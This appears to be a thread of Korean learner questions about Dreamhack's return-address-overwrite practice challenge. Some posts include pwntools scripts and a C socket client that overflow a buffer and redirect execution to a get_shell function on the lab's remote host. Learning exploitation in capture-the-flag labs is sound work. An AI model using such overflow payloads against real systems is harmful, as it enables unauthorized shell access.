arm64 아키텍쳐 (apple silicon) 쓰시는 분들 위 문제 디스어셈블하면 처음 보는 어셈블리어가 쏟아져 나오는데.. 해결 방법이 혹시 있을까요..? ubuntu 22.04 arm64 버전 사용 중입니다

Exploit Tech: Return Address Overwrite에서 실습하는 문제가 있길래 문제를 푸는중이었습니다. 파일을 열어서 버퍼 오버플로우를 발생시켰고, Segmentation fault (core dumped) 라는 에러가 떴습니다 아 드디어 코어파일이 생성됐구나 싶어서 gdb -c core -q를 입력했는데 pwndbg: loaded 160 pwndbg commands and 47 shell commands. Type pwndbg [--shell | --all] [filter] for a list. pwndbg: created $rebase, $base, $ida GDB functions (can be used with print/break) /home/mari/core: No such file or directory. tip of the day (disable with set show-tips off) ------- Pwndbg sets the SIGLARM, SIGBUS, SIGPIPE and SIGSEGV signals so they are not passed to the app; see info signals for full GDB signals configuration 파일이 없다고 뜨는겁니다.. 실습 처음에 버퍼 오버플로우를 발생시킬 땐 아예 (core dumped) 이것도 안떠서 ulimit -c unlimited 로 코어파일이 생성되게 했거든요. 그랬더니 (core dumped) 메세지는 뜨는데, 코어파일은 생성이 안되는거 같습니다. 이거 어떻게 해결하나요?ㅠ 윈도우 11 사용하고 있고, ubuntu 22.04 쓰는중입니다. VMware는 자꾸억까당해서안쓰고그냥터미널에서 코딩하는중입니다.

문제를 풀었고 아래처럼 python으로 익스 코드를 작성했습니다. from pwn import * if name == 'main': context.log_level = 'debug' payload = b'A' * 0x30 + b'B' * 0x8 + b'\xAA\x06\x40\x00\x00\x00\x00\x00' rmt = remote('host3.dreamhack.games', 16605) rmt.send(payload) rmt.interactive() 잘 동작하는 것을 확인했고, 이를 C언어로도 풀어보고 싶어서 아래처럼 작성했습니다. #include <netinet/in.h> #include <sys/socket.h> #include <arpa/inet.h> #include <pthread.h> #include <string.h> #include <unistd.h> #include <stdlib.h> #include <netdb.h> #include <stdio.h> #include <time.h> #define HOST_NAME "host3.dreamhack.games" #define PORT_ADDR 12920 void exit_with_error(char * message) { fputs(message, stderr); fputc('\n', stderr); exit(1); } void print_bytes(uint8_t * bytes, size_t length) { for (int i = 0; i < length; i++) { printf("%02X ", bytes[i]); if ((i + 1) % 16 == 0) { puts(""); continue; } } if (length % 16 != 0) { puts(""); } puts(""); } void * recv_thread(void * arg) { int sock = *(int *)arg; char buffer[100] = {}; ssize_t recv_bytes; while (1) { recv_bytes = recv(sock, buffer, 100, 0); if (recv_bytes <= 0) { break; } printf("%s\n", buffer); } pthread_exit(NULL); } int main(void) { int sock; struct hostent * host; struct sockaddr_in serv_addr; pthread_t recv_thread_id; uint64_t binsh_addr = 0x4006AA; char buffer[100] = {}; char payload[0x40] = {}; memset(payload, 'A', 0x30 + 8); memmove(payload + 0x30 + 8, &binsh_addr, sizeof binsh_addr); if ((sock = socket(PF_INET, SOCK_STREAM, 0)) == -1) { exit_with_error("socket() error"); } if (!(host = gethostbyname(HOST_NAME))) { exit_with_error("gethostbyname() error"); } unsigned long ip_addr = ((struct in_addr *)host->h_addr_list)->s_addr; memset(&serv_addr, 0, sizeof serv_addr); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr = ip_addr; serv_addr.sin_port = htons(PORT_ADDR); if (connect(sock, (struct sockaddr *)&serv_addr, sizeof serv_addr) == -1) { exit_with_error("connect() error"); } recv(sock, buffer, sizeof buffer, 0); print_bytes(buffer, sizeof buffer); memset(buffer, 0, sizeof buffer); ssize_t timer = 1024; if (send(sock, payload, sizeof payload, 0) == -1) { exit_with_error("write error"); } print_bytes(payload, sizeof payload); pthread_create(&recv_thread_id, NULL, recv_thread, (void *)&sock); puts("ineractive >>"); while (1) { printf("$ "); memset(buffer, 0, sizeof buffer); fgets(buffer, sizeof buffer - 1, stdin); if (!strcmp(buffer, "exit\n")) { break; } print_bytes(buffer, sizeof buffer); int send_bytes = send(sock, buffer, strlen(buffer), 0); if (send_bytes == -1) { printf("send failed"); break; } } pthread_join(recv_thread_id, NULL); close(sock); return 0; } interactive로 작성한 부분이 pthread_create부터입니다. 해당 코드 전까지는 입력도 잘 받고 출력도 잘 되지만, interactive부분부터 입력을 서버로 주면 출력을 받질 못합니다. 중간중간 디버깅 코드도 넣어서 돌려봤지만 잘 동작하지 않는 이유를 잘 모르겠습니다. 쉘코드와 함께 나오는 shell_basic 문제는 C언어만으로 해결했습니다.

gdb에서 get_shell의 주소가 4011dd인걸 확인하고 buffer 48바이트 sfp 8바이트 그리고 4011dd를 전달해줬는데 switching to interactive mode뜨고 ls를 입력해줬더니 got eof whilte reading in interactive이 뜨고 종료됩니다... 로컬에서는 되는데 remote로 하면 안되네요 무엇이 문제일까요..?

스택 프레임 포인터라고 하던데 용도가 궁금하고 크기가 0x8이라고 단정할 수 있던 이유도 궁금합니다.

C코드에는 buf 크기가 0x28로 기억되어있는데, GDB로 바이너리 실행파일을 분석해보니 buf크기가 0x30으로 되어있는거 같습니다 혹시 C언어 코드에 오타가 났다고 이해해도될까요?

풀긴 했는데 이해가 안 됩니다.. 원래 같은 건가요? 메모리 주소는 당연히 컴퓨터마다 다르다고 생각했는데...너무 궁금합니다 도움 말씀 부탁드립니다

문제는 풀었지만 char buf의값는 28인데 buf 30 이들어가는 이유가 궁금합니다

void init() { setvbuf(stdin, 0, 2, 0); setvbuf(stdout, 0, 2, 0); } 이 친구가 가지는 의미가 뭔가요..?

from pwn import * p = remote('host3.dreamhack.games',18210) payload = b'A'0x30 + b'B'0x8 + p64(0x4006aa) p.sendlineafter('Input:',payload) p.interactive() 이유를 모르겠습니다...